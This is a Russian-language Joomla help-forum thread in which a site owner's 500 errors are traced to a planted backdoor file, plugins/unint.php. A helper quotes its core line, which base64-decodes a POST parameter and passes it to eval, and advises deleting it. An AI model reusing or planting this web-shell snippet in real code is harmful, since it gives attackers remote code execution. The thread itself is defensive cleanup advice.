0 Пользователей и 1 Гость просматривают эту тему.
  • 12 Ответов
  • 299 Просмотров
*

Ромашкин

  • Осваиваюсь на форуме
  • 92
  • 4
Ошибка 500
« : 11.01.2016, 09:59:06 »
Добрый день. Подскажите пожалуйста после праздников появилась проблема ошибка 500 на пользовательской половине сайта.
В логах очень и очень много раз фигурирует файл /www/plugins/unint.php(2)

Ошибка: PHP Warning: set_time_limit() has been disabled for security reasons in smart-textile.tk/plugins/unint.php(2) : eval()'d code on line 2
Очень надеюсь на Вашу помощь. Заранее всем спасибо!!
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #1 : 11.01.2016, 10:04:17 »
ну лимит превышен вроде.дайте в спойлере код этот.
и такое чувство, что у вас опенкарт стоит и Joomla тут не причём.

задайте принудительно в хтсесе:

php_value max_execution_time 1000

число под себя уже редактируте.

ещё вариант, что в плагине типа этого есть (вы же код не дали) : set_time_limit( тут ваш лимит);
« Последнее редактирование: 11.01.2016, 10:09:12 от vipiusss »
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

Ромашкин

  • Осваиваюсь на форуме
  • 92
  • 4
Re: Ошибка 500
« Ответ #2 : 11.01.2016, 10:14:30 »
Open стоит но на другом домене. Но и на нем ошибка вылезла http://smart-marcet.tk/
Код unint.php:
 
Спойлер
[свернуть]
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #3 : 11.01.2016, 10:24:17 »
$_POST['shauid'] это где у вас? оно туда, точнее оттуда берёт.
удалите вообще это, если не принципиальный код или проверьте что там.
если и на опене вылезает-гоу к хостеру, за жабры его и торбите, пока не сделают.
может у них запрет какой стоит.но ошибка у вас опенкартовская.

и лимит поставьте, вы же не написали, ставили или нет.

эту хрень удалите в коде { $uidmail = base64_decode($_POST['shauid']); eval($uidmail); }
останется

<?php
 if(isset($_POST['shauid']));
 ?>

про ";" вроде будет лишняя, с утра не оч помню синтаксис
« Последнее редактирование: 11.01.2016, 10:31:23 от vipiusss »
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

voland

  • Профи
  • 9513
  • 422
  • Эта строка съедает место на вашем мониторе
Re: Ошибка 500
« Ответ #4 : 11.01.2016, 10:33:25 »
Всё просто - при попытке взломщика работать с сайтом он использует функцию, которая запрещена на вашем хостинге.
Ну ничего, возьмет другой шелл.
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #5 : 11.01.2016, 10:38:23 »
Всё просто - при попытке взломщика работать с сайтом он использует функцию, которая запрещена на вашем хостинге.
Ну ничего, возьмет другой шелл.
кстати я тоже думал про это.
у вас наверно 100 пудово сидит где-то что-то и "шелит" по папкам и не важно, какой движок уже.

///

заказывайте в комм разделе диагностику, если дорожите сайтом и не справитесь своими ручками.
больше советов я не вижу дельных.
« Последнее редактирование: 11.01.2016, 10:42:03 от vipiusss »
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

voland

  • Профи
  • 9513
  • 422
  • Эта строка съедает место на вашем мониторе
Re: Ошибка 500
« Ответ #6 : 11.01.2016, 10:42:48 »
В смысле где-то?
/www/plugins/unint.php - он и есть
ну и еще 100500
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #7 : 11.01.2016, 10:45:36 »
Вот volandа попросите, чтоб не плодить темы, финансово думаю договоритесь, если захочет.Заодно иные ошибки найдёт  ^-^
Любой каприз за ваши деньги (с)
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

Ромашкин

  • Осваиваюсь на форуме
  • 92
  • 4
Re: Ошибка 500
« Ответ #8 : 11.01.2016, 10:52:55 »
В смысле где-то?
/www/plugins/unint.php - он и есть
ну и еще 100500
Вообще всему пипец?? или цистить надо просто. и как это произошло (вероятней всего??)))
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #9 : 11.01.2016, 10:55:31 »
и как это произошло (вероятней всего??)))
скорее всего варез скачанный и "дожидался своего часа"
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

voland

  • Профи
  • 9513
  • 422
  • Эта строка съедает место на вашем мониторе
Re: Ошибка 500
« Ответ #10 : 11.01.2016, 10:56:09 »
Вообще всему пипец?? или цистить надо просто. и как это произошло (вероятней всего??)))
откуда же вы все сегодня?
рейс с луны прибыл?
*

vipiusss

  • Профи
  • 5641
  • 324
  • Круглая ава-зло!
Re: Ошибка 500
« Ответ #11 : 11.01.2016, 10:57:03 »
доллар упал на 2 пункта, вот и проснулись все и ждут твою помощь)))

///

ТС заказывай диагностику и лечение.мой совет.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

voland

  • Профи
  • 9513
  • 422
  • Эта строка съедает место на вашем мониторе
Re: Ошибка 500
« Ответ #12 : 11.01.2016, 10:58:05 »
скорее всего варез скачанный и "дожидался своего часа"
Плохая ты гадалка.
Скорее всего ТС был месяц на луне и не читал рассылку, плюс не проснулся и не прочитал КРАСНЫЕ БУКВЫ на главной.
Ну и какой же русский, даже с плюсами, затруднит себя указать версию.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Ошибка при добавлении материала

Автор nosecrets

Ответов: 0
Просмотров: 22
Последний ответ 24.09.2017, 21:12:10
от nosecrets
Ошибка в выводе результатов поиска

Автор Vkedax212

Ответов: 1
Просмотров: 154
Последний ответ 13.09.2017, 20:27:56
от Nuta
Ошибка при создании компонента в адресе...&view=*название_компонента*

Автор montana_mimimi

Ответов: 2
Просмотров: 78
Последний ответ 11.09.2017, 16:28:16
от montana_mimimi
Не публикуются пункты меню:Ошибка публикации 1 категории так как по крайней мере один из ее родителе

Автор natashalina

Ответов: 10
Просмотров: 359
Последний ответ 01.09.2017, 06:15:51
от natashalina
Ошибка при регистрации нового пользователя

Автор oleg-bogora

Ответов: 13
Просмотров: 627
Последний ответ 26.08.2017, 22:51:24
от kasper9820